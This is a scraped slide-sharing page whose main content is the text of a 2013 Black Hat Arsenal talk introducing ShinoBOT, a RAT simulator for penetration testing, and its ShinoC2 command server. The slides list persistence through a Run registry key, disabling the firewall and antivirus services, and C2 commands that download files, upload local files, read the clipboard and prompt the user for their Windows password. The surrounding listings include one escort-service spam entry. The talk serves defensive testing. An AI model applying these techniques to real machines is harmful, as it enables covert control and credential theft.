Building your own RC Car with Raspberry PiBuilding your own RC Car with Raspberry Pi
Building your own RC Car with Raspberry Pi
 
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
 
Pwning Windows Mobile applications by Ankit Giri
Pwning Windows Mobile applications by Ankit GiriPwning Windows Mobile applications by Ankit Giri
Pwning Windows Mobile applications by Ankit Giri
 
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 

More from Shota Shinogi

LLM App Hacking (AVTOKYO2023)
LLM App Hacking (AVTOKYO2023)LLM App Hacking (AVTOKYO2023)
LLM App Hacking (AVTOKYO2023)Shota Shinogi
 
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptxネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptxShota Shinogi
 
HamaCTF WriteUp (Unpack category)
HamaCTF WriteUp (Unpack category)HamaCTF WriteUp (Unpack category)
HamaCTF WriteUp (Unpack category)Shota Shinogi
 
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)Shota Shinogi
 
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)Shota Shinogi
 
AndroidとPCのみでスマート電球BLEハッキング
AndroidとPCのみでスマート電球BLEハッキングAndroidとPCのみでスマート電球BLEハッキング
AndroidとPCのみでスマート電球BLEハッキングShota Shinogi
 
Sigcheck option memo
Sigcheck option memoSigcheck option memo
Sigcheck option memoShota Shinogi
 
RISEconf 2015 UNOFFICIAL Schedule
RISEconf 2015 UNOFFICIAL ScheduleRISEconf 2015 UNOFFICIAL Schedule
RISEconf 2015 UNOFFICIAL ScheduleShota Shinogi
 

More from Shota Shinogi (10)

LLM App Hacking (AVTOKYO2023)
LLM App Hacking (AVTOKYO2023)LLM App Hacking (AVTOKYO2023)
LLM App Hacking (AVTOKYO2023)
 
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptxネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
 
HamaCTF WriteUp (Unpack category)
HamaCTF WriteUp (Unpack category)HamaCTF WriteUp (Unpack category)
HamaCTF WriteUp (Unpack category)
 
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)
 
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
 
AndroidとPCのみでスマート電球BLEハッキング
AndroidとPCのみでスマート電球BLEハッキングAndroidとPCのみでスマート電球BLEハッキング
AndroidとPCのみでスマート電球BLEハッキング
 
Honeypot Spotted
Honeypot SpottedHoneypot Spotted
Honeypot Spotted
 
Sigcheck option memo
Sigcheck option memoSigcheck option memo
Sigcheck option memo
 
RISEconf 2015 UNOFFICIAL Schedule
RISEconf 2015 UNOFFICIAL ScheduleRISEconf 2015 UNOFFICIAL Schedule
RISEconf 2015 UNOFFICIAL Schedule
 
Hexdump memo
Hexdump memoHexdump memo
Hexdump memo
 

Recently uploaded

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 

Recently uploaded (20)

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 

Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)

  • 1. ShinoBOT ShinoC2 Can you prevent APT like me? - the pentest tool to measure the defense against APT/RAT - Author: Shota Shinogi 1
  • 2. >whoami Name: Shota Shinogi pronounce: ʃota ʃinogi @sh1n0g1 work in the Security Research Center of Macnica Networks Corp., Japan. my carrier of security 2 HDD Encryption (SafeBoot) 2004 2007 Personal Firewall (Sygate) 2009 Host DLP (McAfee Host DLP) 2010 Network IPS (McAfee NSP) 2011 Web App Firewall (Citrix Netscaler) I’m here 2013 a Japanese disty of security products Security Researcher (not product oriented)
  • 3. >strings ShinoBOT.exe BOT or RAT(Remote Administration Tool) Simulator for pentest. It connects to ShinoC2; the C&C server, every 10 sec. If it get any jobs, it does it immediately. Supported Platform Windows XP/Vista/7 ( + .net framework ≥ 2.x) Mayby Windows 8, not fully tested yet… Acts like a malware Before doing the job received from ShinoC2, it acts a little bit like a malware. Copy itself in the user home directory C:Users%user%ShinoBOT.exe Add the registry (to start everytime on booting). HKCUSoftwareMicrosoftWindowsCurrent VersionRun Disable Windows Firewall Stop Windows Update service Stop the service of McAfee, Symantec Antivirus 3
  • 4. >more ShinoBOT.exe Features C&C as a service you don’t need to build your C&C server. Easy to go. Password Protection only the guy which know the password can control your host Job Sharing you share your nice hacking command for everyone and use the command other people created. Work through proxy As the channel is HTTP(S), it can work with the proxy 4
  • 5. >whois ShinoC2 ShinoC2 is the Command & Control server for ShinoBOT. You (red team) can create a job and send it to your ShinoBOT-affected devices. It has a web GUI so you can manipulate by your favorite browser, smart device, etc. 5 ShinoBOT ShinoC2Access/Send Results Command
  • 6. >more purpose_of_ShinoBOT_ShinoC2.txt The steps before “Install” of Kill Chain… called PRE- COMPROMISED phase (search “Cyber Kill Chain” from Lockheed Martin if you are not familiar) It is very difficult to prevent those steps perfectly. So we have to consider how to prevent the following step… 6 Phase Attacker’s Activity How to prevent Recon • Social Engineering • Collectiong info from SNS, press release… • more and more • User Education how about fool users(sigh) Weaponization • Using Packer • XOR Crypt • etc for evade AV/IPS • IPS/AV efficient only for the known binaries Delivery • Send by email • Drive By Download • Gateway Antivirus • Web Filter efficient only for the known bad ip/domain/bin Exploit • Attack the vulnerabililty of IE,Adobe,Java, etc. • Patches, patches, patches… how about the zero day attacks??
  • 7. >tail purpose_of_ShinoBOT_ShinoC2.txt The following steps called POST-COMPROMISED which covered by ShinoBOT You can use ShinoBOT/ShinoC2 to test your environment to know what’s happen after the success of zero day attacks. does your security gear can detect it ? if yes, what kind of logs you can see ? 7 Phase Attacker’s Activity Coverage Install • Install RAT ShinoBOTC&C • Connect to C&C Actions on Objective • Critical data exfiltration
  • 8. >man ShinoBOT How to setup 一. Download ShinoBOT 二. Run ShinoBOT 三. That’s all. How to use 一. Access to ShinoC2 二. Click the [HOST] link. Your host will be there. 三. Click [Assign Job] 四. Select the job you want to run on your host. (you can also create your job, see the slide “man ShinoC2:job”) 五. Enter the password provided from the GUI of ShinoBOT 六. Press [Assign] button. 七. Wait 10 seconds. 八. You job will be done. 8
  • 10. >SBOTshot:ShinoBOT GUI 10 • It has a GUI ? Yes, ShinoBOT is not a tool for the bad people. So I made ShinoBOT not to become silent. This is also the reason why you need the password to send the job.
  • 12. >man ShinoC2 job page1 You can create your own job by the job menu 12
  • 13. >man ShinoC2 job page2 The “command” will be redirected to cmd.exe except those special commands. 13 Commands Notes Examples SBOTshot Take a screen shot SBOTshot SBOTwget Download a file SBOTwget:http://www.xxx/aaa.exe SBOTfget Upload the local file to C2 SBOTfget:C:boot.ini SBOTrunA Run a process asynchronous *it means ShinoBOT will not wait until the process end. SBOTrunA:notepad.exe SBOTmbox Show a message box SBOTmbox:hello there SBOTibox Show an input box ( you can ask something to the user ) SBOTibox:input your windows password SBOTexit Kill ShinoBOT SBOTexit SBOTclpb Get the data from clibboard SBOTclpb *All command are case sensitive.
  • 14. >vim Roadmap Coming soon… Take a snapshot from the webcam. Encrypt the C&C channel, not using SSL. Encrypt strings in the binary. Hide itselft by a kernel driver. (become a root-kit) 14